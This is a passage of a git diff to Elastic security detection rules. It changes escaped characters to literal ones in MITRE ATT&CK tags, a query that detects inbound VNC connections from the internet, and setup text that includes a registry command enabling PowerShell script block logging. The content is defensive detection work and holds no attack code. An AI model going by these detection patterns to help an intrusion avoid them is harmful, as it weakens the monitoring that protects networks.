@@ -67,7 +67,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", @@ -82,7 +82,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", diff --git a/packages/security_detection_engine/kibana/security_rule/5700cb81-df44-46aa-a5d7-337798f53eb8_102.json b/packages/security_detection_engine/kibana/security_rule/5700cb81-df44-46aa-a5d7-337798f53eb8_102.json index 6a6d8f4a84a..318c10ca4f5 100644 --- a/packages/security_detection_engine/kibana/security_rule/5700cb81-df44-46aa-a5d7-337798f53eb8_102.json +++ b/packages/security_detection_engine/kibana/security_rule/5700cb81-df44-46aa-a5d7-337798f53eb8_102.json @@ -15,7 +15,7 @@ "language": "kuery", "license": "Elastic License v2", "name": "VNC (Virtual Network Computing) from the Internet", - "query": "event.dataset: network_traffic.flow and network.transport:tcp and destination.port \u003e= 5800 and destination.port \u003c= 5810 and\n not source.ip:(\n 10.0.0.0/8 or\n 127.0.0.0/8 or\n 169.254.0.0/16 or\n 172.16.0.0/12 or\n 192.0.0.0/24 or\n 192.0.0.0/29 or\n 192.0.0.8/32 or\n 192.0.0.9/32 or\n 192.0.0.10/32 or\n 192.0.0.170/32 or\n 192.0.0.171/32 or\n 192.0.2.0/24 or\n 192.31.196.0/24 or\n 192.52.193.0/24 or\n 192.168.0.0/16 or\n 192.88.99.0/24 or\n 224.0.0.0/4 or\n 100.64.0.0/10 or\n 192.175.48.0/24 or\n 198.18.0.0/15 or\n 198.51.100.0/24 or\n 203.0.113.0/24 or\n 240.0.0.0/4 or\n \"::1\" or\n \"FE80::/10\" or\n \"FF00::/8\"\n ) and\n destination.ip:(\n 10.0.0.0/8 or\n 172.16.0.0/12 or\n 192.168.0.0/16\n )\n", + "query": "event.dataset: network_traffic.flow and network.transport:tcp and destination.port >= 5800 and destination.port <= 5810 and\n not source.ip:(\n 10.0.0.0/8 or\n 127.0.0.0/8 or\n 169.254.0.0/16 or\n 172.16.0.0/12 or\n 192.0.0.0/24 or\n 192.0.0.0/29 or\n 192.0.0.8/32 or\n 192.0.0.9/32 or\n 192.0.0.10/32 or\n 192.0.0.170/32 or\n 192.0.0.171/32 or\n 192.0.2.0/24 or\n 192.31.196.0/24 or\n 192.52.193.0/24 or\n 192.168.0.0/16 or\n 192.88.99.0/24 or\n 224.0.0.0/4 or\n 100.64.0.0/10 or\n 192.175.48.0/24 or\n 198.18.0.0/15 or\n 198.51.100.0/24 or\n 203.0.113.0/24 or\n 240.0.0.0/4 or\n \"::1\" or\n \"FE80::/10\" or\n \"FF00::/8\"\n ) and\n destination.ip:(\n 10.0.0.0/8 or\n 172.16.0.0/12 or\n 192.168.0.0/16\n )\n", "references": [ "https://www.iana.org/assignments/iana-ipv4-special-registry/iana-ipv4-special-registry.xhtml" ], @@ -63,7 +63,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", @@ -78,7 +78,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", diff --git a/packages/security_detection_engine/kibana/security_rule/5700cb81-df44-46aa-a5d7-337798f53eb8_103.json b/packages/security_detection_engine/kibana/security_rule/5700cb81-df44-46aa-a5d7-337798f53eb8_103.json index f1b2c0062fc..08e805f1601 100644 --- a/packages/security_detection_engine/kibana/security_rule/5700cb81-df44-46aa-a5d7-337798f53eb8_103.json +++ b/packages/security_detection_engine/kibana/security_rule/5700cb81-df44-46aa-a5d7-337798f53eb8_103.json @@ -15,7 +15,7 @@ "language": "kuery", "license": "Elastic License v2", "name": "VNC (Virtual Network Computing) from the Internet", - "query": "event.dataset: network_traffic.flow and network.transport:tcp and destination.port \u003e= 5800 and destination.port \u003c= 5810 and\n not source.ip:(\n 10.0.0.0/8 or\n 127.0.0.0/8 or\n 169.254.0.0/16 or\n 172.16.0.0/12 or\n 192.0.0.0/24 or\n 192.0.0.0/29 or\n 192.0.0.8/32 or\n 192.0.0.9/32 or\n 192.0.0.10/32 or\n 192.0.0.170/32 or\n 192.0.0.171/32 or\n 192.0.2.0/24 or\n 192.31.196.0/24 or\n 192.52.193.0/24 or\n 192.168.0.0/16 or\n 192.88.99.0/24 or\n 224.0.0.0/4 or\n 100.64.0.0/10 or\n 192.175.48.0/24 or\n 198.18.0.0/15 or\n 198.51.100.0/24 or\n 203.0.113.0/24 or\n 240.0.0.0/4 or\n \"::1\" or\n \"FE80::/10\" or\n \"FF00::/8\"\n ) and\n destination.ip:(\n 10.0.0.0/8 or\n 172.16.0.0/12 or\n 192.168.0.0/16\n )\n", + "query": "event.dataset: network_traffic.flow and network.transport:tcp and destination.port >= 5800 and destination.port <= 5810 and\n not source.ip:(\n 10.0.0.0/8 or\n 127.0.0.0/8 or\n 169.254.0.0/16 or\n 172.16.0.0/12 or\n 192.0.0.0/24 or\n 192.0.0.0/29 or\n 192.0.0.8/32 or\n 192.0.0.9/32 or\n 192.0.0.10/32 or\n 192.0.0.170/32 or\n 192.0.0.171/32 or\n 192.0.2.0/24 or\n 192.31.196.0/24 or\n 192.52.193.0/24 or\n 192.168.0.0/16 or\n 192.88.99.0/24 or\n 224.0.0.0/4 or\n 100.64.0.0/10 or\n 192.175.48.0/24 or\n 198.18.0.0/15 or\n 198.51.100.0/24 or\n 203.0.113.0/24 or\n 240.0.0.0/4 or\n \"::1\" or\n \"FE80::/10\" or\n \"FF00::/8\"\n ) and\n destination.ip:(\n 10.0.0.0/8 or\n 172.16.0.0/12 or\n 192.168.0.0/16\n )\n", "references": [ "https://www.iana.org/assignments/iana-ipv4-special-registry/iana-ipv4-special-registry.xhtml" ], @@ -62,7 +62,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", @@ -77,7 +77,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", diff --git a/packages/security_detection_engine/kibana/security_rule/5700cb81-df44-46aa-a5d7-337798f53eb8_104.json b/packages/security_detection_engine/kibana/security_rule/5700cb81-df44-46aa-a5d7-337798f53eb8_104.json index 2500a0d9852..0037b66d23f 100644 --- a/packages/security_detection_engine/kibana/security_rule/5700cb81-df44-46aa-a5d7-337798f53eb8_104.json +++ b/packages/security_detection_engine/kibana/security_rule/5700cb81-df44-46aa-a5d7-337798f53eb8_104.json @@ -17,7 +17,7 @@ "language": "kuery", "license": "Elastic License v2", "name": "VNC (Virtual Network Computing) from the Internet", - "query": "(event.dataset: network_traffic.flow or (event.category: (network or network_traffic))) and\n network.transport:tcp and destination.port \u003e= 5800 and destination.port \u003c= 5810 and\n not source.ip:(\n 10.0.0.0/8 or\n 127.0.0.0/8 or\n 169.254.0.0/16 or\n 172.16.0.0/12 or\n 192.0.0.0/24 or\n 192.0.0.0/29 or\n 192.0.0.8/32 or\n 192.0.0.9/32 or\n 192.0.0.10/32 or\n 192.0.0.170/32 or\n 192.0.0.171/32 or\n 192.0.2.0/24 or\n 192.31.196.0/24 or\n 192.52.193.0/24 or\n 192.168.0.0/16 or\n 192.88.99.0/24 or\n 224.0.0.0/4 or\n 100.64.0.0/10 or\n 192.175.48.0/24 or\n 198.18.0.0/15 or\n 198.51.100.0/24 or\n 203.0.113.0/24 or\n 240.0.0.0/4 or\n \"::1\" or\n \"FE80::/10\" or\n \"FF00::/8\"\n ) and\n destination.ip:(\n 10.0.0.0/8 or\n 172.16.0.0/12 or\n 192.168.0.0/16\n )\n", + "query": "(event.dataset: network_traffic.flow or (event.category: (network or network_traffic))) and\n network.transport:tcp and destination.port >= 5800 and destination.port <= 5810 and\n not source.ip:(\n 10.0.0.0/8 or\n 127.0.0.0/8 or\n 169.254.0.0/16 or\n 172.16.0.0/12 or\n 192.0.0.0/24 or\n 192.0.0.0/29 or\n 192.0.0.8/32 or\n 192.0.0.9/32 or\n 192.0.0.10/32 or\n 192.0.0.170/32 or\n 192.0.0.171/32 or\n 192.0.2.0/24 or\n 192.31.196.0/24 or\n 192.52.193.0/24 or\n 192.168.0.0/16 or\n 192.88.99.0/24 or\n 224.0.0.0/4 or\n 100.64.0.0/10 or\n 192.175.48.0/24 or\n 198.18.0.0/15 or\n 198.51.100.0/24 or\n 203.0.113.0/24 or\n 240.0.0.0/4 or\n \"::1\" or\n \"FE80::/10\" or\n \"FF00::/8\"\n ) and\n destination.ip:(\n 10.0.0.0/8 or\n 172.16.0.0/12 or\n 192.168.0.0/16\n )\n", "references": [ "https://www.iana.org/assignments/iana-ipv4-special-registry/iana-ipv4-special-registry.xhtml" ], @@ -69,7 +69,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", @@ -84,7 +84,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", diff --git a/packages/security_detection_engine/kibana/security_rule/571afc56-5ed9-465d-a2a9-045f099f6e7e_100.json b/packages/security_detection_engine/kibana/security_rule/571afc56-5ed9-465d-a2a9-045f099f6e7e_100.json index 1824185a1c6..6e49fc670dc 100644 --- a/packages/security_detection_engine/kibana/security_rule/571afc56-5ed9-465d-a2a9-045f099f6e7e_100.json +++ b/packages/security_detection_engine/kibana/security_rule/571afc56-5ed9-465d-a2a9-045f099f6e7e_100.json @@ -52,7 +52,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/571afc56-5ed9-465d-a2a9-045f099f6e7e_101.json b/packages/security_detection_engine/kibana/security_rule/571afc56-5ed9-465d-a2a9-045f099f6e7e_101.json index a9f7402316c..f58168a1bc8 100644 --- a/packages/security_detection_engine/kibana/security_rule/571afc56-5ed9-465d-a2a9-045f099f6e7e_101.json +++ b/packages/security_detection_engine/kibana/security_rule/571afc56-5ed9-465d-a2a9-045f099f6e7e_101.json @@ -51,7 +51,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/573f6e7a-7acf-4bcd-ad42-c4969124d3c0_101.json b/packages/security_detection_engine/kibana/security_rule/573f6e7a-7acf-4bcd-ad42-c4969124d3c0_101.json index 5c8fac6ee42..f727c15dcdd 100644 --- a/packages/security_detection_engine/kibana/security_rule/573f6e7a-7acf-4bcd-ad42-c4969124d3c0_101.json +++ b/packages/security_detection_engine/kibana/security_rule/573f6e7a-7acf-4bcd-ad42-c4969124d3c0_101.json @@ -59,7 +59,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0040", "name": "Impact", diff --git a/packages/security_detection_engine/kibana/security_rule/573f6e7a-7acf-4bcd-ad42-c4969124d3c0_102.json b/packages/security_detection_engine/kibana/security_rule/573f6e7a-7acf-4bcd-ad42-c4969124d3c0_102.json index 5be784b35c4..13252822829 100644 --- a/packages/security_detection_engine/kibana/security_rule/573f6e7a-7acf-4bcd-ad42-c4969124d3c0_102.json +++ b/packages/security_detection_engine/kibana/security_rule/573f6e7a-7acf-4bcd-ad42-c4969124d3c0_102.json @@ -56,7 +56,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0040", "name": "Impact", diff --git a/packages/security_detection_engine/kibana/security_rule/577ec21e-56fe-4065-91d8-45eb8224fe77_105.json b/packages/security_detection_engine/kibana/security_rule/577ec21e-56fe-4065-91d8-45eb8224fe77_105.json index e0e5c4b417b..beefa073c64 100644 --- a/packages/security_detection_engine/kibana/security_rule/577ec21e-56fe-4065-91d8-45eb8224fe77_105.json +++ b/packages/security_detection_engine/kibana/security_rule/577ec21e-56fe-4065-91d8-45eb8224fe77_105.json @@ -52,7 +52,7 @@ ], "risk_score": 73, "rule_id": "577ec21e-56fe-4065-91d8-45eb8224fe77", - "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nAdministrative Templates \u003e\nWindows PowerShell \u003e\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```", + "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```", "severity": "high", "tags": [ "Elastic", @@ -65,7 +65,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", @@ -87,7 +87,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/577ec21e-56fe-4065-91d8-45eb8224fe77_106.json b/packages/security_detection_engine/kibana/security_rule/577ec21e-56fe-4065-91d8-45eb8224fe77_106.json index c03c2c5a946..d3282af4e4f 100644 --- a/packages/security_detection_engine/kibana/security_rule/577ec21e-56fe-4065-91d8-45eb8224fe77_106.json +++ b/packages/security_detection_engine/kibana/security_rule/577ec21e-56fe-4065-91d8-45eb8224fe77_106.json @@ -52,7 +52,7 @@ ], "risk_score": 73, "rule_id": "577ec21e-56fe-4065-91d8-45eb8224fe77", - "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nAdministrative Templates \u003e\nWindows PowerShell \u003e\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```", + "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```", "severity": "high", "tags": [ "Domain: Endpoint", @@ -64,7 +64,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", @@ -86,7 +86,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/577ec21e-56fe-4065-91d8-45eb8224fe77_107.json b/packages/security_detection_engine/kibana/security_rule/577ec21e-56fe-4065-91d8-45eb8224fe77_107.json index 0934afca775..f33a1879d36 100644 --- a/packages/security_detection_engine/kibana/security_rule/577ec21e-56fe-4065-91d8-45eb8224fe77_107.json +++ b/packages/security_detection_engine/kibana/security_rule/577ec21e-56fe-4065-91d8-45eb8224fe77_107.json @@ -52,7 +52,7 @@ ], "risk_score": 73, "rule_id": "577ec21e-56fe-4065-91d8-45eb8224fe77", - "setup": "\nThe 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nAdministrative Templates \u003e\nWindows PowerShell \u003e\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```\n", + "setup": "\nThe 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```\n", "severity": "high", "tags": [ "Domain: Endpoint", @@ -64,7 +64,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", @@ -86,7 +86,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/57bccf1d-daf5-4e1a-9049-ff79b5254704_1.json b/packages/security_detection_engine/kibana/security_rule/57bccf1d-daf5-4e1a-9049-ff79b5254704_1.json index 15131f5299c..0208f767e46 100644 --- a/packages/security_detection_engine/kibana/security_rule/57bccf1d-daf5-4e1a-9049-ff79b5254704_1.json +++ b/packages/security_detection_engine/kibana/security_rule/57bccf1d-daf5-4e1a-9049-ff79b5254704_1.json @@ -55,7 +55,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0009", "name": "Collection", diff --git a/packages/security_detection_engine/kibana/security_rule/57bccf1d-daf5-4e1a-9049-ff79b5254704_2.json b/packages/security_detection_engine/kibana/security_rule/57bccf1d-daf5-4e1a-9049-ff79b5254704_2.json index e84b2a039dc..9bcd9d9704c 100644 --- a/packages/security_detection_engine/kibana/security_rule/57bccf1d-daf5-4e1a-9049-ff79b5254704_2.json +++ b/packages/security_detection_engine/kibana/security_rule/57bccf1d-daf5-4e1a-9049-ff79b5254704_2.json @@ -55,7 +55,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0009", "name": "Collection", diff --git a/packages/security_detection_engine/kibana/security_rule/581add16-df76-42bb-af8e-c979bfb39a59_104.json b/packages/security_detection_engine/kibana/security_rule/581add16-df76-42bb-af8e-c979bfb39a59_104.json index 1e52ffeb888..cfd37a11e01 100644 --- a/packages/security_detection_engine/kibana/security_rule/581add16-df76-42bb-af8e-c979bfb39a59_104.json +++ b/packages/security_detection_engine/kibana/security_rule/581add16-df76-42bb-af8e-c979bfb39a59_104.json @@ -55,7 +55,7 @@ ], "risk_score": 21, "rule_id": "581add16-df76-42bb-af8e-c979bfb39a59", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Elastic", @@ -68,7 +68,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0040", "name": "Impact", diff --git a/packages/security_detection_engine/kibana/security_rule/581add16-df76-42bb-af8e-c979bfb39a59_105.json b/packages/security_detection_engine/kibana/security_rule/581add16-df76-42bb-af8e-c979bfb39a59_105.json index 4ac119fac52..01d5cf45b8b 100644 --- a/packages/security_detection_engine/kibana/security_rule/581add16-df76-42bb-af8e-c979bfb39a59_105.json +++ b/packages/security_detection_engine/kibana/security_rule/581add16-df76-42bb-af8e-c979bfb39a59_105.json @@ -55,7 +55,7 @@ ], "risk_score": 21, "rule_id": "581add16-df76-42bb-af8e-c979bfb39a59", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Domain: Endpoint", @@ -67,7 +67,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0040", "name": "Impact", diff --git a/packages/security_detection_engine/kibana/security_rule/581add16-df76-42bb-af8e-c979bfb39a59_106.json b/packages/security_detection_engine/kibana/security_rule/581add16-df76-42bb-af8e-c979bfb39a59_106.json index 72ab99aad09..f25050c8038 100644 --- a/packages/security_detection_engine/kibana/security_rule/581add16-df76-42bb-af8e-c979bfb39a59_106.json +++ b/packages/security_detection_engine/kibana/security_rule/581add16-df76-42bb-af8e-c979bfb39a59_106.json @@ -55,7 +55,7 @@ ], "risk_score": 21, "rule_id": "581add16-df76-42bb-af8e-c979bfb39a59", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Domain: Endpoint", @@ -68,7 +68,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0040", "name": "Impact", diff --git a/packages/security_detection_engine/kibana/security_rule/581add16-df76-42bb-af8e-c979bfb39a59_107.json b/packages/security_detection_engine/kibana/security_rule/581add16-df76-42bb-af8e-c979bfb39a59_107.json index 0f448048a91..e6b8dc66302 100644 --- a/packages/security_detection_engine/kibana/security_rule/581add16-df76-42bb-af8e-c979bfb39a59_107.json +++ b/packages/security_detection_engine/kibana/security_rule/581add16-df76-42bb-af8e-c979bfb39a59_107.json @@ -55,7 +55,7 @@ ], "risk_score": 21, "rule_id": "581add16-df76-42bb-af8e-c979bfb39a59", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Domain: Endpoint", @@ -68,7 +68,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0040", "name": "Impact", diff --git a/packages/security_detection_engine/kibana/security_rule/581add16-df76-42bb-af8e-c979bfb39a59_108.json b/packages/security_detection_engine/kibana/security_rule/581add16-df76-42bb-af8e-c979bfb39a59_108.json index 2057d690d18..00f9f4d3980 100644 --- a/packages/security_detection_engine/kibana/security_rule/581add16-df76-42bb-af8e-c979bfb39a59_108.json +++ b/packages/security_detection_engine/kibana/security_rule/581add16-df76-42bb-af8e-c979bfb39a59_108.json @@ -55,7 +55,7 @@ ], "risk_score": 21, "rule_id": "581add16-df76-42bb-af8e-c979bfb39a59", - "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", "severity": "low", "tags": [ "Domain: Endpoint", @@ -68,7 +68,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0040", "name": "Impact", diff --git a/packages/security_detection_engine/kibana/security_rule/58aa72ca-d968-4f34-b9f7-bea51d75eb50_104.json b/packages/security_detection_engine/kibana/security_rule/58aa72ca-d968-4f34-b9f7-bea51d75eb50_104.json index ea2196a62f1..5a20d5b26f1 100644 --- a/packages/security_detection_engine/kibana/security_rule/58aa72ca-d968-4f34-b9f7-bea51d75eb50_104.json +++ b/packages/security_detection_engine/kibana/security_rule/58aa72ca-d968-4f34-b9f7-bea51d75eb50_104.json @@ -65,7 +65,7 @@ ], "risk_score": 47, "rule_id": "58aa72ca-d968-4f34-b9f7-bea51d75eb50", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -78,7 +78,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", diff --git a/packages/security_detection_engine/kibana/security_rule/58aa72ca-d968-4f34-b9f7-bea51d75eb50_105.json b/packages/security_detection_engine/kibana/security_rule/58aa72ca-d968-4f34-b9f7-bea51d75eb50_105.json index 47605ffe9e0..fcbab63a711 100644 --- a/packages/security_detection_engine/kibana/security_rule/58aa72ca-d968-4f34-b9f7-bea51d75eb50_105.json +++ b/packages/security_detection_engine/kibana/security_rule/58aa72ca-d968-4f34-b9f7-bea51d75eb50_105.json @@ -65,7 +65,7 @@ ], "risk_score": 47, "rule_id": "58aa72ca-d968-4f34-b9f7-bea51d75eb50", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -77,7 +77,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", diff --git a/packages/security_detection_engine/kibana/security_rule/58aa72ca-d968-4f34-b9f7-bea51d75eb50_106.json b/packages/security_detection_engine/kibana/security_rule/58aa72ca-d968-4f34-b9f7-bea51d75eb50_106.json index 3d49bb7930d..795d0a94bf3 100644 --- a/packages/security_detection_engine/kibana/security_rule/58aa72ca-d968-4f34-b9f7-bea51d75eb50_106.json +++ b/packages/security_detection_engine/kibana/security_rule/58aa72ca-d968-4f34-b9f7-bea51d75eb50_106.json @@ -55,7 +55,7 @@ ], "risk_score": 47, "rule_id": "58aa72ca-d968-4f34-b9f7-bea51d75eb50", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -67,7 +67,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", diff --git a/packages/security_detection_engine/kibana/security_rule/58aa72ca-d968-4f34-b9f7-bea51d75eb50_107.json b/packages/security_detection_engine/kibana/security_rule/58aa72ca-d968-4f34-b9f7-bea51d75eb50_107.json index 88df15e71c3..d9c0575182c 100644 --- a/packages/security_detection_engine/kibana/security_rule/58aa72ca-d968-4f34-b9f7-bea51d75eb50_107.json +++ b/packages/security_detection_engine/kibana/security_rule/58aa72ca-d968-4f34-b9f7-bea51d75eb50_107.json @@ -55,7 +55,7 @@ ], "risk_score": 47, "rule_id": "58aa72ca-d968-4f34-b9f7-bea51d75eb50", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL 